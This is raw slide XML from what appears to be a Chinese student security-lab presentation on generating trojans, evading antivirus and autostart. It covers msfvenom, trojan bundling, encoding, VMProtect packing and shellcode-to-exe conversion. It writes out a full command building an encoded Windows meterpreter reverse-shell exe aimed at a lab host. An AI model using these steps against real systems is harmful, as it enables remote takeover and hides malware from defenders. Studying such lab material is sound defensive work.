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8" r:id="rId3"/>
    <p:sldMasterId id="2147483685" r:id="rId4"/>
    <p:sldMasterId id="2147483702" r:id="rId5"/>
    <p:sldMasterId id="2147483719" r:id="rId6"/>
    <p:sldMasterId id="2147483736" r:id="rId7"/>
    <p:sldMasterId id="2147483753" r:id="rId8"/>
    <p:sldMasterId id="2147483770" r:id="rId9"/>
    <p:sldMasterId id="2147483787" r:id="rId10"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId44"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId45"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="259" r:id="rId11"/>
    <p:sldId id="262" r:id="rId12"/>
    <p:sldId id="269" r:id="rId13"/>
    <p:sldId id="1724" r:id="rId14"/>
    <p:sldId id="1729" r:id="rId15"/>
    <p:sldId id="1730" r:id="rId16"/>
    <p:sldId id="1732" r:id="rId17"/>
    <p:sldId id="1744" r:id="rId18"/>
    <p:sldId id="1733" r:id="rId19"/>
    <p:sldId id="261" r:id="rId20"/>
    <p:sldId id="1734" r:id="rId21"/>
    <p:sldId id="1735" r:id="rId22"/>
    <p:sldId id="1736" r:id="rId23"/>
    <p:sldId id="1737" r:id="rId24"/>
    <p:sldId id="1738" r:id="rId25"/>
    <p:sldId id="1739" r:id="rId26"/>
    <p:sldId id="1740" r:id="rId27"/>
    <p:sldId id="1745" r:id="rId28"/>
    <p:sldId id="1742" r:id="rId29"/>
    <p:sldId id="312" r:id="rId30"/>
    <p:sldId id="1743" r:id="rId31"/>
    <p:sldId id="1786" r:id="rId32"/>
    <p:sldId id="1774" r:id="rId33"/>
    <p:sldId id="266" r:id="rId34"/>
    <p:sldId id="1775" r:id="rId35"/>
    <p:sldId id="1776" r:id="rId36"/>
    <p:sldId id="1777" r:id="rId37"/>
    <p:sldId id="1779" r:id="rId38"/>
    <p:sldId id="1780" r:id="rId39"/>
    <p:sldId id="1781" r:id="rId40"/>
    <p:sldId id="1784" r:id="rId41"/>
    <p:sldId id="1785" r:id="rId42"/>
    <p:sldId id="275" r:id="rId43"/>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内容" id="{847108E3-22F3-4CD9-A82A-834291DC17F4}">
          <p14:sldIdLst>
            <p14:sldId id="262"/>
            <p14:sldId id="269"/>
            <p14:sldId id="1724"/>
            <p14:sldId id="1729"/>
            <p14:sldId id="1730"/>
            <p14:sldId id="1732"/>
            <p14:sldId id="1744"/>
            <p14:sldId id="1733"/>
            <p14:sldId id="261"/>
            <p14:sldId id="1734"/>
            <p14:sldId id="1735"/>
            <p14:sldId id="1736"/>
            <p14:sldId id="1737"/>
            <p14:sldId id="1738"/>
            <p14:sldId id="1739"/>
            <p14:sldId id="1740"/>
            <p14:sldId id="1745"/>
            <p14:sldId id="1742"/>
            <p14:sldId id="312"/>
            <p14:sldId id="1743"/>
            <p14:sldId id="1786"/>
            <p14:sldId id="1774"/>
            <p14:sldId id="266"/>
            <p14:sldId id="1775"/>
            <p14:sldId id="1776"/>
            <p14:sldId id="1777"/>
            <p14:sldId id="1779"/>
            <p14:sldId id="1780"/>
            <p14:sldId id="1781"/>
            <p14:sldId id="1784"/>
            <p14:sldId id="1785"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="封底" id="{843E591D-6EE2-4691-951C-C0C689F22170}">
          <p14:sldIdLst>
            <p14:sldId id="275"/>
          </p14:sldIdLst>
        </p14:section>
      </p14:sectionLst>
    </p:ext>
    <p:ext uri="{EFAFB233-063F-42B5-8137-9DF3F51BA10A}">
      <p15:sldGuideLst xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main">
        <p15:guide id="4" pos="3854" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="5" orient="horz" pos="1003" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="6" orient="horz" pos="1502" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="7" orient="horz" pos="3142"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90" d="100"/>
          <a:sy n="90" d="100"/>
        </p:scale>
        <p:origin x="312" y="58"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide pos="3854"/>
        <p:guide orient="horz" pos="1003"/>
        <p:guide orient="horz" pos="1502"/>
        <p:guide orient="horz" pos="3142"/>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ags" Target="tags/tag1.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木马简介</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{6E0D5545-95D4-489F-B8ED-7EAFA774B567}"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err="1"/>
              <a:t>Msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>工具介绍。命令介绍。</a:t>
            </a:r>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i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:alpha val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>木马程序的特性即是捆绑在正常可执行文件中，接下来进行木马程序的捆绑实验</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{6E0D5545-95D4-489F-B8ED-7EAFA774B567}"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10.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4.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6.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8.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6.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9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www.virustotal.com/gui/home/upload" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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86024"/>
            <a:ext cx="9379365" cy="1060855"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>木马生成、免杀及自启动实验</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>信息安全综合实践课堂报告</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62767360-C5D9-6DA3-FC4F-986F32DCB014}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="内容占位符 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64EB1EF9-BB6B-22DB-07B6-183692B26087}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="10"/>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木马免杀</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="文本占位符 68"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>由于普通木马很容易被杀毒软件检测到，使用木马免杀手段降低杀毒软件检测到的概率。</a:t>
            </a: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02</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木马免杀</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445541"/>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木马免杀</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>：破坏木马特征，这里的特征有可能是特征码，还有可能是行为特征，只要破坏了病毒或木马的固有特征，并且保证原有的功能没有改变，那么免杀就算是完成了。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>免杀手段：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>MSF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>编码；加壳；生成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>转</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>文件</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木马免杀</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——MSF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>编码</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591996" y="1003659"/>
            <a:ext cx="11008005" cy="485068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97" y="1003659"/>
            <a:ext cx="11008005" cy="48506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木马免杀</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——MSF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>编码</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196284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使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>x86/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>shikata_ga_nai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>编码器：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> -p windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>lhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>=192.168.47.130 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>lport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>=5555  -e x86/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>shikata_ga_nai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> 12 -f exe -o /root/test_pro.exe</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="24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木马免杀</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>结果检测</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3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1725143" y="2235200"/>
            <a:ext cx="8694263" cy="525016"/>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杀毒引擎检测</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p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="组合 7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="1439202"/>
            <a:ext cx="12192000" cy="3672468"/>
            <a:chOff x="0" y="1910542"/>
            <a:chExt cx="12192000" cy="3672468"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形: 圆角 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="1910542"/>
              <a:ext cx="12192000" cy="3672468"/>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0542"/>
              <a:ext cx="12192000" cy="3036916"/>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木马免杀</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>加壳</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522451"/>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使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Vmproject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>软件对生成的木马</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>文件进行加壳处理</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="24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木马免杀</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>结果检测</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3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1725143" y="2235200"/>
            <a:ext cx="8694263" cy="525016"/>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杀毒引擎检测</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p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="组合 7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="1437833"/>
            <a:ext cx="12192000" cy="3716553"/>
            <a:chOff x="0" y="1856933"/>
            <a:chExt cx="12192000" cy="3716553"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形: 圆角 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="1856933"/>
              <a:ext cx="12192000" cy="371655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6933"/>
              <a:ext cx="12192000" cy="314413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351" y="43657"/>
            <a:ext cx="8228447" cy="598488"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>木马免杀</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>生成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>转为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件</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442976"/>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先使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>主机生成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>shellcode.py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>源码，然后使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>py2exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>文件将其转为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>文件</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> -p python/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>lhost</a:t>
            </a:r>
            <a:r>
